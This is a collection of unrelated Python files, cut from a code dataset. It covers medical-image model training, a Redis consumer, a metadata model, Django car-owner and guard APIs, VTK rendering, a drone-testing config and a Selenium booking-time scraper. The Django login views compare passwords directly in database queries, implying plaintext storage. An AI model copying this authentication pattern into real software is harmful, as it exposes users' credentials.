MyTrain(BasicTrainTask):\n def __init__(\n self,\n model_dir,\n network,\n description=\"Train DeepEdit model for 3D Images\",\n spatial_size=(128, 128, 64),\n target_spacing=(1.0, 1.0, 1.0),\n deepgrow_probability_train=0.5,\n deepgrow_probability_val=1.0,\n max_train_interactions=20,\n max_val_interactions=10,\n label_names=None,\n debug_mode=False,\n **kwargs,\n ):\n self._network = network\n self.spatial_size = spatial_size\n self.target_spacing = target_spacing\n self.deepgrow_probability_train = deepgrow_probability_train\n self.deepgrow_probability_val = deepgrow_probability_val\n self.max_train_interactions = max_train_interactions\n self.max_val_interactions = max_val_interactions\n self.label_names = label_names\n self.debug_mode = debug_mode\n\n super().__init__(model_dir, description, **kwargs)\n\n def network(self):\n return self._network\n\n def optimizer(self):\n return torch.optim.Adam(self._network.parameters(), lr=0.0001)\n # return torch.optim.AdamW(self._network.parameters(), lr=1e-4, weight_decay=1e-5)\n\n 
def loss_function(self):\n # return DiceLoss(to_onehot_y=True, softmax=True)\n return DiceCELoss(to_onehot_y=True, softmax=True)\n\n def get_click_transforms(self):\n return [\n Activationsd(keys=\"pred\", softmax=True),\n AsDiscreted(keys=\"pred\", argmax=True),\n ToNumpyd(keys=(\"image\", \"label\", \"pred\")),\n # Transforms for click simulation\n FindDiscrepancyRegionsCustomd(keys=\"label\", pred=\"pred\", discrepancy=\"discrepancy\"),\n PosNegClickProbAddRandomGuidanceCustomd(\n keys=\"NA\",\n guidance=\"guidance\",\n discrepancy=\"discrepancy\",\n probability=\"probability\",\n ),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def train_pre_transforms(self):\n return [\n LoadImaged(keys=(\"image\", \"label\"), reader=\"nibabelreader\"),\n SelectLabelsAbdomenDatasetd(keys=\"label\", label_names=self.label_names),\n # SingleModalityLabelSanityd(keys=(\"image\", \"label\"), label_names=self.label_names),\n AddChanneld(keys=(\"image\", \"label\")),\n Spacingd(keys=[\"image\", \"label\"], pixdim=self.target_spacing, mode=(\"bilinear\", \"nearest\")),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n # This transform may not work well for MR images\n ScaleIntensityRanged(\n keys=\"image\",\n a_min=-175,\n a_max=250,\n b_min=0.0,\n b_max=1.0,\n clip=True,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[0],\n prob=0.10,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[1],\n prob=0.10,\n ),\n RandFlipd(\n keys=(\"image\", \"label\"),\n spatial_axis=[2],\n prob=0.10,\n ),\n RandRotate90d(\n keys=(\"image\", \"label\"),\n prob=0.10,\n max_k=3,\n ),\n RandShiftIntensityd(\n keys=\"image\",\n offsets=0.10,\n prob=0.50,\n ),\n Resized(keys=(\"image\", \"label\"), spatial_size=self.spatial_size, mode=(\"area\", \"nearest\")),\n # Transforms for click simulation\n FindAllValidSlicesCustomd(keys=\"label\", sids=\"sids\"),\n AddInitialSeedPointCustomd(keys=\"label\", guidance=\"guidance\", sids=\"sids\"),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def train_post_transforms(self):\n # FOR DICE EVALUATION\n return [\n Activationsd(keys=\"pred\", softmax=True),\n AsDiscreted(\n keys=(\"pred\", \"label\"),\n argmax=(True, False),\n to_onehot=(True, True),\n n_classes=len(self.label_names),\n ),\n SplitPredsLabeld(keys=\"pred\"),\n # ToCheckTransformd(keys=\"pred\"),\n ]\n\n def val_pre_transforms(self):\n return [\n LoadImaged(keys=(\"image\", \"label\"), reader=\"nibabelreader\"),\n SelectLabelsAbdomenDatasetd(keys=\"label\", label_names=self.label_names),\n # SingleModalityLabelSanityd(keys=(\"image\", \"label\"), label_names=self.label_names),\n AddChanneld(keys=(\"image\", \"label\")),\n Spacingd(keys=[\"image\", \"label\"], pixdim=self.target_spacing, mode=(\"bilinear\", \"nearest\")),\n Orientationd(keys=[\"image\", \"label\"], axcodes=\"RAS\"),\n # This transform may not work well for MR images\n ScaleIntensityRanged(\n keys=(\"image\"),\n a_min=-175,\n a_max=250,\n b_min=0.0,\n b_max=1.0,\n clip=True,\n ),\n Resized(keys=(\"image\", \"label\"), spatial_size=self.spatial_size, mode=(\"area\", \"nearest\")),\n # Transforms for click simulation\n FindAllValidSlicesCustomd(keys=\"label\", sids=\"sids\"),\n AddInitialSeedPointCustomd(keys=\"label\", guidance=\"guidance\", sids=\"sids\"),\n AddGuidanceSignalCustomd(keys=\"image\", guidance=\"guidance\"),\n #\n AsDiscreted(keys=\"label\", to_onehot=True, 
num_classes=len(self.label_names)),\n ToTensord(keys=(\"image\", \"label\")),\n ]\n\n def val_inferer(self):\n return SimpleInferer()\n\n def train_iteration_update(self):\n return Interaction(\n deepgrow_probability=self.deepgrow_probability_train,\n transforms=self.get_click_transforms(),\n max_interactions=self.max_train_interactions,\n click_probability_key=\"probability\",\n train=True,\n label_names=self.label_names,\n )\n\n def val_iteration_update(self):\n return Interaction(\n deepgrow_probability=self.deepgrow_probability_val,\n transforms=self.get_click_transforms(),\n max_interactions=self.max_val_interactions,\n click_probability_key=\"probability\",\n train=False,\n label_names=self.label_names,\n )\n\n def train_key_metric(self):\n all_metrics = dict()\n all_metrics[\"train_dice\"] = MeanDice(output_transform=from_engine([\"pred\", \"label\"]), include_background=False)\n for _, (key_label, _) in enumerate(self.label_names.items()):\n if key_label != \"background\":\n all_metrics[key_label + \"_dice\"] = MeanDice(\n output_transform=from_engine([\"pred_\" + key_label, \"label_\" + key_label]), include_background=False\n )\n return all_metrics\n\n def val_key_metric(self):\n all_metrics = dict()\n all_metrics[\"val_mean_dice\"] = MeanDice(\n output_transform=from_engine([\"pred\", \"label\"]), include_background=False\n )\n for _, (key_label, _) in enumerate(self.label_names.items()):\n if key_label != \"background\":\n all_metrics[key_label + \"_dice\"] = MeanDice(\n output_transform=from_engine([\"pred_\" + key_label, \"label_\" + key_label]), include_background=False\n )\n return all_metrics\n\n def partition_datalist(self, request, datalist, shuffle=True):\n # Training images\n train_d = datalist\n\n # Validation images\n data_dir = \"/home/adp20local/Documents/Datasets/monailabel_datasets/multilabel_abdomen/NIFTI/val\"\n val_images = sorted(glob.glob(os.path.join(data_dir, \"imgs\", \"*.nii.gz\")))\n val_labels = sorted(glob.glob(os.path.join(data_dir, \"labels\", \"*.nii.gz\")))\n val_d = [{\"image\": image_name, \"label\": label_name} for image_name, label_name in zip(val_images, val_labels)]\n\n return train_d, val_d\n\n def train_handlers(self, output_dir, events_dir, evaluator, local_rank=0):\n handlers = super().train_handlers(output_dir, events_dir, evaluator, local_rank)\n if self.debug_mode and local_rank == 0:\n handlers.append(TensorBoardImageHandler(log_dir=events_dir))\n return handlers\n","sub_path":"sample-apps/deepedit_multilabel/lib/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"62090282","text":"import redis\nimport json\nimport time\nclass consumer():\n def __init__(self):\n self.client = redis.Redis()\n\n def readMessage(self):\n try:\n msg = json.loads(self.client.lrange('queue', 0, 0)[0])\n self.client.ltrim('queue', 1, -1)\n return msg\n except:\n return None\n\n def startReading(self, duration):\n tmp = self.readMessage()\n begin = time.time()\n while tmp != None and time.time() - begin < 10:\n print(tmp)\n time.sleep(0.1)\n tmp = self.readMessage()\n","sub_path":"solutions/wtiproj02/05/wtiproj02_consumer.py","file_name":"wtiproj02_consumer.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"206570046","text":"from Levenshtein import distance, jaro_winkler\nfrom collections import defaultdict\n\nclass 
DataObject(object):\n \"\"\"Abstract data model object that specific classes inherit from. Sets\n basic functions that allow writing/retrieving attributes.\"\"\"\n def __init__(self):\n pass\n\n def __setitem__(self, key, value):\n self.__dict__[key] = value\n\n def __getitem__(self, key):\n return self.__dict__[key]\n\n def getDictValue(self):\n \"\"\"Convert current object into a dict. Used for generating JSON objects\n and in other instances where a standard type is necessary.\"\"\"\n return vars(self)\n\n @classmethod\n def createFromDict(cls, **kwargs):\n \"\"\"Take a standard dict object and convert to an instance of the\n provided class. Allows for creation of new instances with arbitrary\n fields set\"\"\"\n record = cls()\n for field, value in kwargs.items():\n record[field] = value\n\n return record\n\n\nclass WorkRecord(DataObject):\n def __init__(self):\n super()\n self.identifiers = []\n self.instances = []\n self.subjects = []\n self.agents = []\n self.links = []\n self.measurements = []\n self.dates = []\n self.uuid = None\n self.license = None\n self.language = None\n self.title = None\n self.sub_title = None\n self.alt_titles = None\n self.sort_title = None\n self.rights_statement = None\n self.medium = None\n self.series = None\n self.seriesPosition = None\n self.primary_identifier = None\n\n def addIdentifier(self, **identifierDict):\n self.identifiers.append(Identifier.createFromDict(**identifierDict))\n\n def addInstance(self, **instanceDict):\n self.instances.append(InstanceRecord.createFromDict(**instanceDict))\n\n def addSubject(self, **subjectDict):\n self.subjects.append(Subject.createFromDict(**subjectDict))\n\n def addAgent(self, **agentDict):\n self.agents.append(Agent.createFromDict(**agentDict))\n\n def addMeasurement(self, **measurementDict):\n self.measurements.append(Measurement.createFromDict(**measurementDict))\n\n def addDate(self, **dateDict):\n self.dates.append(Date.createFromDict(**dateDict))\n\n\nclass InstanceRecord(DataObject):\n def __init__(self, title=None, language=None):\n super()\n self.title = title\n self.language = language\n self.sub_title = None\n self.alt_titles = []\n self.pub_place = None\n self.edition = None\n self.extent = None\n self.edition_statement = None\n self.table_of_contents = None\n self.copyright_date = None\n self.series = None\n self.series_position = None\n self.agents = []\n self.identifiers = []\n self.formats = []\n self.measurements = []\n self.subjects = []\n self.links = []\n self.dates = []\n\n def addIdentifier(self, **identifierDict):\n self.identifiers.append(Identifier.createFromDict(**identifierDict))\n\n def addSubject(self, **subjectDict):\n self.subjects.append(Subject.createFromDict(**subjectDict))\n\n def addFormat(self, **formatDict):\n self.formats.append(Format.createFromDict(**formatDict))\n\n def addLink(self, **linkDict):\n self.links.append(Link.createFromDict(**linkDict))\n\n def addDate(self, **dateDict):\n self.dates.append(Date.createFromDict(**dateDict))\n\n\nclass Format(DataObject):\n def __init__(self, content_type=None, link=None, modified=None):\n super()\n self.content_type = content_type\n self.modified = modified\n self.drm = None\n self.measurements = []\n self.links = []\n self.dates = []\n\n if (isinstance(link, Link)):\n self.links = [link]\n else:\n self.setLink(url=link)\n\n def setLink(self, **linkFields):\n newLink = Link.createFromDict(**linkFields)\n self.links = [newLink]\n\n\nclass Agent(DataObject):\n def __init__(self, name=None, role=None, aliases=None, birth=None, 
death=None, link=None):\n super()\n self.name = name\n self.sort_name = None\n self.lcnaf = None\n self.viaf = None\n self.biography = None\n if aliases is None:\n self.aliases = []\n else:\n self.aliases = aliases\n self.link = link\n self.dates = []\n\n if isinstance(role, (str, int)):\n self.roles = [role]\n else:\n self.roles = role\n\n # TODO This method is pretty ugly and there must be a better way to merge\n # agent records. However, it does work\n @staticmethod\n def checkForMatches(newAgents, agents):\n merged = defaultdict(dict)\n for agent in agents:\n merger = list(filter(lambda x: jaro_winkler(x['name'].lower(), agent['name'].lower()) > 0.8, newAgents))\n if(len(merger) > 0):\n mergedAgent = merger[0]\n merged[mergedAgent['name']] = Agent.mergeFromDict(agent, mergedAgent)\n else:\n merged[agent.name] = agent\n\n for newAgent in newAgents:\n if newAgent.name not in merged:\n merged[newAgent.name] = newAgent\n\n return merged.values()\n\n @staticmethod\n def mergeFromDict(otherAgent, agent):\n if isinstance(otherAgent, Agent):\n otherAgent = otherAgent.getDictValue()\n for key, value in otherAgent.items():\n if key == 'aliases' and agent.aliases is not None :\n agent['aliases'].extend(value)\n continue\n if key == 'roles':\n if isinstance(value, (str, int)):\n value = [value]\n agent['roles'].extend(value)\n if agent[key] is None:\n agent[key] = value\n return agent\n\n\nclass Identifier(DataObject):\n def __init__(self, source=None, identifier=None, weight=None):\n super()\n self.type = source\n self.identifier = identifier\n self.weight = weight\n\n\nclass Link(DataObject):\n def __init__(self, url=None, mediaType=None, flags=None):\n super()\n self.url = url\n self.media_type = mediaType\n self.content = None\n self.flags = flags\n self.thumbnail = None\n\n\nclass Subject(DataObject):\n def __init__(self, subjectType=None, value=None, weight=None):\n super()\n self.authority = subjectType\n self.subject = value\n self.uri = None\n self.weight = weight\n self.measurements = []\n\n def addMeasurement(self, **measurementDict):\n self.measurements.append(Measurement.createFromDict(**measurementDict))\n\n\nclass Measurement(DataObject):\n def __init__(self, quantity=None, value=None, weight=None, takenAt=None, sourceID=None):\n super()\n self.quantity = quantity\n self.value = value\n self.weight = weight\n self.taken_at = takenAt\n self.source_id = sourceID\n\n @staticmethod\n def getValueForMeasurement(measurementList, quantity):\n retMeasurement = list(filter(lambda x: x['quantity'] == quantity, measurementList))\n return retMeasurement[0]['value']\n\n\nclass Date(DataObject):\n def __init__(self, displayDate=None, dateRange=None, dateType=None):\n super()\n self.display_date = displayDate\n self.date_range = dateRange\n self.date_type = dateType\n","sub_path":"lib/dataModel.py","file_name":"dataModel.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133432515","text":"from django.http import HttpResponse, JsonResponse\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\nfrom vecurityapiapp.models import (\n CarOwner,\n Car,\n Guard\n)\nfrom vecurityapiapp.serializers import (\n CarOwnerSerializer,\n CarSerializer,\n AddCarSerializer,\n GuardSerializer\n)\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom django.http import Http404\nfrom django.utils.six import 
BytesIO\nfrom rest_framework.parsers import JSONParser\nimport pickle\n\n\n# When using functions/methods as views\n@api_view(['GET', 'POST'])\ndef car_owner_list(request, format=None):\n \"\"\"\n List all car owners, or create a new car owner.\n \"\"\"\n if request.method == 'GET':\n snippets = CarOwner.objects.all()\n serializer = CarOwnerSerializer(snippets, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = CarOwnerSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@api_view(['GET', 'PUT', 'DELETE'])\ndef car_owner_detail(request, pk, format=None):\n \"\"\"\n Retrieve, update or delete a code snippet.\n \"\"\"\n try:\n car_owner = CarOwner.objects.get(pk=pk)\n except CarOwner.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = CarOwnerSerializer(car_owner)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = CarOwnerSerializer(car_owner, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n car_owner.delete()\n return HttpResponse(status=204)\n\n\n# Using classes as views\nclass CarOwnerList(APIView):\n \"\"\"\n List all car owners, or create a new car owner.\n \"\"\"\n\n def get(self, request, format=None):\n carowners = CarOwner.objects.all()\n serializer = CarOwnerSerializer(carowners, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = CarOwnerSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n res = {\n 'msg': 'signup successful',\n 'error': 0,\n 'success': 1,\n 'id': serializer.data['id']\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_201_CREATED)\n else:\n res = {\n 'msg': 'signup unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CarOwnerDetail(APIView):\n \"\"\"\n Retrieve, update or delete a car owner instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return CarOwner.objects.get(pk=pk)\n except CarOwner.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n carowner = self.get_object(pk)\n serializer = CarOwnerSerializer(carowner)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n carowner = self.get_object(pk)\n serializer = CarOwnerSerializer(carowner, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n carowner = self.get_object(pk)\n carowner.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CarList(APIView):\n \"\"\"\n List all cars, or create a new car.\n \"\"\"\n\n def get(self, request, format=None):\n cars = Car.objects.all()\n serializer = CarSerializer(cars, many=True)\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = CarSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return 
Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CarDetail(APIView):\n \"\"\"\n Retrieve, update or delete a car owner instance.\n \"\"\"\n\n def get_object(self, pk):\n try:\n return Car.objects.get(pk=pk)\n except Car.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n car = self.get_object(pk)\n serializer = CarSerializer(car)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n car = self.get_object(pk)\n serializer = CarSerializer(car, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n car = self.get_object(pk)\n car.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass AddCar(APIView):\n def post(self, request, format=None):\n car_owner_id = request.data['owner_id']\n license_number = request.data['license_number']\n color = request.data['color']\n pdict = {\n 'car_owner_id': car_owner_id,\n 'license_number': license_number,\n 'color': color\n }\n\n serializer = AddCarSerializer(data=pdict)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass OwnerCars(APIView):\n def get(self, request, oid, format=None):\n cars = Car.objects.filter(car_owner_id=oid)\n serializer = CarSerializer(cars, many=True)\n print(cars)\n return Response(serializer.data)\n\n\nclass CarOwnerLogin(APIView):\n def post(self, request, format=None):\n email = request.data['email']\n password = request.data['password']\n if email and password:\n user = CarOwner.objects.filter(email=email).filter(password=password)\n if user.exists():\n res = {\n 'msg': 'Login successful',\n 'error': 0,\n 'success': 1,\n 'id': user[0].id\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_200_OK)\n else:\n res = {\n 'msg': 'Login unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n else:\n res = {\n 'msg': 'No credentials found',\n 'error': 2,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass GuardLogin(APIView):\n def post(self, request, format=None):\n email = request.data['email']\n password = request.data['password']\n if email and password:\n user = Guard.objects.filter(email=email).filter(password=password)\n if user.exists():\n res = {\n 'msg': 'Login successful',\n 'error': 0,\n 'success': 1,\n 'id': user[0].id\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_200_OK)\n else:\n res = {\n 'msg': 'Login unsuccessful',\n 'error': 1,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, status=status.HTTP_400_BAD_REQUEST)\n else:\n res = {\n 'msg': 'No credentials found',\n 'error': 2,\n 'success': 0,\n 'id': 0\n }\n response = pickle.dumps(res)\n jsonresp = pickle.loads(response)\n return Response(jsonresp, 
status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"vecurityapi/vecurityapiapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"565474380","text":"#!/usr/bin/env python\n\n\n# import os\n\nimport vtk\n# from vtk.util.misc import vtkGetDataRoot\n# VTK_DATA_ROOT = vtkGetDataRoot()\n\n\n\n\n# try:\n # VTK_DATA = os.environ['VTK_DATA']\n# except KeyError:\n # VTK_DATA = '../../../vtkdata/'\n\n# from libVTKCommonPython import *\n# from libVTKGraphicsPython import *\n\n# Example demonstrates use of abstract vtkDataSetToDataSetFilter\n# (i.e., vtkElevationFilter - an abstract filter)\n\nsphere = vtk.vtkSphereSource()\nsphere.SetPhiResolution(12)\nsphere.SetThetaResolution(12)\n\ncolorIt = vtk.vtkElevationFilter()\ncolorIt.SetInput(sphere.GetOutput())\ncolorIt.SetLowPoint(0,0,-1)\ncolorIt.SetHighPoint(0,0,1)\n\n\n\nplyW = vtk.vtkPLYWriter ()\nplyW.SetFileTypeToASCII ()\nplyW.SetInput (colorIt.GetPolyDataOutput())\nplyW.SetFileName (\"sph.ply\")\nplyW.Write()\n\n\n\npolyW = vtk.vtkPolyDataWriter ()\npolyW.SetFileTypeToASCII ()\npolyW.SetInput (colorIt.GetPolyDataOutput())\npolyW.SetFileName (\"sph.vtk\")\npolyW.Write()\n\n\n\n\n\n\n\nmapper = vtk.vtkPolyDataMapper()\nmapper.SetInput(colorIt.GetPolyDataOutput())\n\nactor = vtk.vtkActor()\nactor.SetMapper(mapper)\n\nren = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.AddRenderer(ren)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\nren.AddActor(actor)\nren.SetBackground(1,1,1)\nrenWin.SetSize(400,400)\nren.GetActiveCamera().Zoom(1.4)\n\niren.Initialize()\n\niren.Start()\n\n","sub_path":"idea/src/vtkUtilities/conversion/osgdb_vtk/testData/src/ColorSphOut.py","file_name":"ColorSphOut.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"485126012","text":"import sys\nfrom pdt.train_tf import *\nfrom wacacore.util.io import handle_args\nfrom tensortemplates.module import template_module, nl_module\nimport os\n\ndef default_benchmark_options():\n \"Get default options for pdt training\"\n options = {}\n options['num_iterations'] = (int, 1000)\n options['save_every'] = (int, 100)\n options['batch_size'] = (int, 512)\n options['dirname'] = (str, \"dirname\")\n options['datadir'] = (str, os.path.join(os.environ['DATADIR'], \"pdt\"))\n return options\n\n\ndef game_options(adt):\n options = {}\n if adt == 'atari':\n options['game'] = (str, 'Breakout-v0')\n return options\n","sub_path":"examples/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"313275212","text":"# coding:utf-8\nimport sys\nimport Cptool.config\n\n\nclass ToolConfig:\n class ConstError(PermissionError):\n pass\n\n class ConstCaseError(ConstError):\n pass\n\n def __setattr__(self, name, value):\n if name in self.__dict__:\n raise self.ConstError(\"can't change const %s\" % name)\n if not name.isupper():\n raise self.ConstCaseError('const name \"%s\" is not all uppercase' % name)\n self.__dict__[name] = value\n\n\ntoolConfig = ToolConfig()\n# SITL Type PX4 and Ardupilot\n# {'PX4','Ardupilot'}\ntoolConfig.MODE = 'Ardupilot'\n# Simulation Type\n# Ardupilot : ['Airsim', 'Morse', 'Gazebo', 'SITL']\n# PX4 : ['Jmavsim']\ntoolConfig.SIM = 'SITL'\n# Simulation Speed\ntoolConfig.SPEED = 10\n# Output Debug 
Message\ntoolConfig.DEBUG = True\n# Wind Speed range\ntoolConfig.WIND_RANGE = [8, 10.7]\n# GUI Windows size\ntoolConfig.HEIGHT = 640\ntoolConfig.WEIGHT = 480\n# Mission flight attitude range\ntoolConfig.LIMIT_H = 50\ntoolConfig.LIMIT_L = 40\n# Copter LOG Path\ntoolConfig.ARDUPILOT_LOG_PATH = '/media/rain/data'\n# PX4 LOG Path\ntoolConfig.PX4_LOG_PATH = '/home/rain/PX4-Autopilot'\n# Mavlink Part\ntoolConfig.LOG_MAP = ['IMU', 'ATT', 'RATE', 'PARM']\n# LOG_MAP = ['ATT', 'RATE']\ntoolConfig.PARAM = [\n \"PSC_POSXY_P\",\n \"PSC_VELXY_P\",\n \"PSC_POSZ_P\",\n \"ATC_ANG_RLL_P\",\n \"ATC_ANG_PIT_P\",\n \"ATC_ANG_YAW_P\",\n \"ATC_RAT_RLL_I\",\n \"ATC_RAT_RLL_D\",\n \"ATC_RAT_RLL_P\",\n \"ATC_RAT_PIT_P\",\n \"ATC_RAT_PIT_I\",\n \"ATC_RAT_PIT_D\",\n \"ATC_RAT_YAW_P\",\n \"ATC_RAT_YAW_I\",\n \"ATC_RAT_YAW_D\",\n \"WPNAV_SPEED\",\n \"WPNAV_SPEED_UP\",\n \"WPNAV_SPEED_DN\",\n \"WPNAV_ACCEL\",\n \"ANGLE_MAX\",\n]\n","sub_path":"Cptool/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"407713425","text":"from selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport sys, os\r\nimport re\r\n\r\nclass Available_time_finder:\r\n def __init__(self, url, area, number_results):\r\n self.url = url\r\n self.area = area\r\n self.number_results = number_results\r\n print(\"Loading browser driver...\")\r\n self.load_driver(\"firefox\")\r\n self.connected = False\r\n #self.connect()\r\n # self.get_results()\r\n # self.close_driver()\r\n\r\n def load_driver(self, browser):\r\n _platform = sys.platform\r\n if _platform == \"linux\" or _platform == \"linux2\": # linux\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_linux')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_linux')\r\n elif _platform == \"darwin\": # MAC OS X\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_mac')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_mac')\r\n elif _platform == \"win32\" or _platform == \"win64\": # Windows\r\n firefox_driver_path = os.path.join('drivers', 'geckodriver_win')\r\n chrome_driver_path = os.path.join('drivers', 'chromedriver_win')\r\n\r\n if browser == 'firefox':\r\n try:\r\n from selenium.webdriver.firefox.options import Options\r\n firefox_options = Options()\r\n firefox_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Firefox(executable_path=firefox_driver_path, firefox_options=firefox_options)\r\n print(\"Loaded firefox driver.\")\r\n except Exception as e:\r\n if 'executable needs to be in PATH' in str(e): #driver not found\r\n msg = \"Firefox webdriver is missing! Try reinstalling the program.\"\r\n print(msg)\r\n sys.exit(1)\r\n else:\r\n self.load_driver('chrome')\r\n elif browser == 'chrome':\r\n try:\r\n from selenium.webdriver.chrome.options import Options\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Chrome(executable_path=chrome_driver_path, chrome_options=chrome_options)\r\n print(\"Loaded chrome driver.\")\r\n except Exception as e:\r\n print(e)\r\n if 'executable needs to be in PATH' in str(e): #driver not found\r\n msg = \"Chrome webdriver is missing! 
Try reinstalling the program.\"\r\n                    print(msg)\r\n                    sys.exit(1)\r\n                else:\r\n                    self.load_driver(None)\r\n        else:\r\n            msg = \"To use extensive run, either Firefox or Chrome must be installed!\"\r\n            print(msg)\r\n            sys.exit(1)\r\n\r\n    def connect(self):\r\n        print(\"Connecting...\")\r\n        if not self.connected:\r\n            self.driver.get(self.url)\r\n            self.driver.find_element_by_name(\"NextButtonID20\").click()\r\n            self.driver.find_element_by_name(\"AcceptInformationStorage\").click()\r\n            self.driver.find_element_by_xpath(\"//div[@class='btn-toolbar']//input[@name='Next']\").click()\r\n            self.connected = True\r\n        options = Select(self.driver.find_element_by_id('SectionId'))\r\n        options.select_by_visible_text(self.area)\r\n        print(\"Found source.\")\r\n\r\n    def get_results(self):\r\n        try:\r\n            self.driver.find_element_by_name(\"TimeSearchFirstAvailableButton\").click()\r\n        except:\r\n            self.connected = False\r\n            self.connect()\r\n        self.page_source = self.driver.page_source\r\n        self.soup = BeautifulSoup(self.page_source, 'html.parser')\r\n        cells = self.soup.find_all('div', {\"data-function\":\"timeTableCell\"})\r\n        available_times = []\r\n        for cell in cells:\r\n            if cell[\"aria-label\"] != \"Bokad\":\r\n                available_times.append(cell[\"aria-label\"])\r\n        def getKey(item):\r\n            return re.findall(r'\\b\\d+\\b', item)\r\n        available_times = sorted(available_times, key=getKey)\r\n        res = []\r\n        for i in range(self.number_results):\r\n            if i < len(available_times):\r\n                res.append(available_times[i])\r\n        return res\r\n\r\n    def close_driver(self):\r\n        self.driver.stop_client()\r\n        self.driver.close()\r\n        self.driver.quit()\r\n\r\nif __name__ == '__main__':\r\n    url = \"https://ventus.enalog.se/Booking/Booking/Index/skane\"\r\n    area = \"Lund\"\r\n    number_results = 10\r\n    Available_time_finder(url, area, number_results)\r\n\r\n","sub_path":"available_time_finder.py","file_name":"available_time_finder.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
